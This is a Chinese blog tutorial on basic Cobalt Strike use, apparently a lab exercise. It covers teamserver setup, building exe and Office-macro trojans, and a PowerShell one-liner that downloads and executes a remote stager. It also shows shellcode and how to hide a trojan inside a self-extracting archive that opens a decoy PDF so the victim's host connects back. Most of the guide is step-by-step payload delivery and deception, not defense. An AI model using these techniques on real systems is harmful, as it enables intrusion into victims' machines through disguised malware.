cobalt strike基础使用

2023-12-13 02:30
文章标签 基础 使用 cobalt strike

本文主要是介绍cobalt strike基础使用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

coblat strike使用

服务搭建

首先将server端文件放进kali中

image-20231212193304738

对其赋权

image-20231212193638023

执行时需要root权限

设置ip

启动服务

./teamserver 10.4.7.138 123456

image-20231212194014237

回到win11启动cs,输入刚才配置的信息

image-20231212194210950

上线方式

木马(exe上线)

查看一下开放的端口

image-20231212195247967

添加监听

image-20231212195709609

再查看端口就发现一个新的监听端口

image-20231212195747671

新建木马

image-20231212195857878

image-20231212195929414

如果使用耳机添加过监听的话,选择choose就行了

执行一下木马,主机就上线了

image-20231212200311775

右键选择interact可以进入beacon会话

此时可以将sleep设为3

image-20231212200536161

直接用问号就可以看能使用的命令字

image-20231212200614616

也可以执行命令

shell whoami

image-20231212200912783

点击这个可以看到连接关系

image-20231212201144509

宏病毒

image-20231212202832048

输入个名字创建一下

image-20231212203110610

选择ms office

image-20231212203148817

生成之后选择复制

image-20231212203238342

内容粘贴进去

image-20231212203520457

生成的文件双击点击上线

image-20231212203926501

powershell

image-20231212205049332

同样选择监听对象然后生成

image-20231212205117277

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.4.7.138:80/a'))"

powershell中执行一下,主机上线

image-20231212205237569

shellcode

image-20231212205709035

仍然是选择监听对象然后生成

可以记事本打开看看

image-20231212205757425

这些数据格式其实就是硬编码加x

image-20231212210056630

可以使用加载器将这串编成exe格式

首先生成一个木马,然后贴进去一个pdf文件

image-20231212212828388

选中两个选择添加压缩文件

image-20231212212851615

勾选创建自解压文件

image-20231212212933306

image-20231212213845230

image-20231212213950585

image-20231212214010757

image-20231212214051266

image-20231212214947911

此处需要将光标放在fdp之前,插入完成后可以看到

image-20231212215020077

双击之后主机就会上线

image-20231212215119187

并且打开pdf文件

image-20231212215150510

插件

image-20231212215350209

image-20231212215401142

image-20231212215427653

重载后发现多了一个巨龙拉冬

image-20231212215515044

这篇关于cobalt strike基础使用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/486839

相关文章

使用Dify访问mysql数据库详细代码示例

《使用Dify访问mysql数据库详细代码示例》:本文主要介绍使用Dify访问mysql数据库的相关资料,并详细讲解了如何在本地搭建数据库访问服务,使用ngrok暴露到公网,并创建知识库、数据库访... 1、在本地搭建数据库访问的服务,并使用ngrok暴露到公网。#sql_tools.pyfrom

使用mvn deploy命令上传jar包的实现

《使用mvndeploy命令上传jar包的实现》本文介绍了使用mvndeploy:deploy-file命令将本地仓库中的JAR包重新发布到Maven私服,文中通过示例代码介绍的非常详细,对大家的学... 目录一、背景二、环境三、配置nexus上传账号四、执行deploy命令上传包1. 首先需要把本地仓中要

Spring Cloud之注册中心Nacos的使用详解

《SpringCloud之注册中心Nacos的使用详解》本文介绍SpringCloudAlibaba中的Nacos组件,对比了Nacos与Eureka的区别,展示了如何在项目中引入SpringClo... 目录Naacos服务注册/服务发现引⼊Spring Cloud Alibaba依赖引入Naco编程s依

Java springBoot初步使用websocket的代码示例

《JavaspringBoot初步使用websocket的代码示例》:本文主要介绍JavaspringBoot初步使用websocket的相关资料,WebSocket是一种实现实时双向通信的协... 目录一、什么是websocket二、依赖坐标地址1.springBoot父级依赖2.springBoot依赖

Java使用Mail构建邮件功能的完整指南

《Java使用Mail构建邮件功能的完整指南》JavaMailAPI是一个功能强大的工具,它可以帮助开发者轻松实现邮件的发送与接收功能,本文将介绍如何使用JavaMail发送和接收邮件,希望对大家有所... 目录1、简述2、主要特点3、发送样例3.1 发送纯文本邮件3.2 发送 html 邮件3.3 发送带

使用DeepSeek搭建个人知识库(在笔记本电脑上)

《使用DeepSeek搭建个人知识库(在笔记本电脑上)》本文介绍了如何在笔记本电脑上使用DeepSeek和开源工具搭建个人知识库,通过安装DeepSeek和RAGFlow,并使用CherryStudi... 目录部署环境软件清单安装DeepSeek安装Cherry Studio安装RAGFlow设置知识库总

Python FastAPI入门安装使用

《PythonFastAPI入门安装使用》FastAPI是一个现代、快速的PythonWeb框架,用于构建API,它基于Python3.6+的类型提示特性,使得代码更加简洁且易于绶护,这篇文章主要介... 目录第一节:FastAPI入门一、FastAPI框架介绍什么是ASGI服务(WSGI)二、FastAP

Spring-AOP-ProceedingJoinPoint的使用详解

《Spring-AOP-ProceedingJoinPoint的使用详解》:本文主要介绍Spring-AOP-ProceedingJoinPoint的使用方式,具有很好的参考价值,希望对大家有所帮... 目录ProceedingJoinPoijsnt简介获取环绕通知方法的相关信息1.proceed()2.g

Maven pom.xml文件中build,plugin标签的使用小结

《Mavenpom.xml文件中build,plugin标签的使用小结》本文主要介绍了Mavenpom.xml文件中build,plugin标签的使用小结,文中通过示例代码介绍的非常详细,对大家的学... 目录<build> 标签Plugins插件<build> 标签<build> 标签是 pom.XML

JAVA虚拟机中 -D, -X, -XX ,-server参数使用

《JAVA虚拟机中-D,-X,-XX,-server参数使用》本文主要介绍了JAVA虚拟机中-D,-X,-XX,-server参数使用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录一、-D参数二、-X参数三、-XX参数总结:在Java开发过程中,对Java虚拟机(JVM)的启动参数进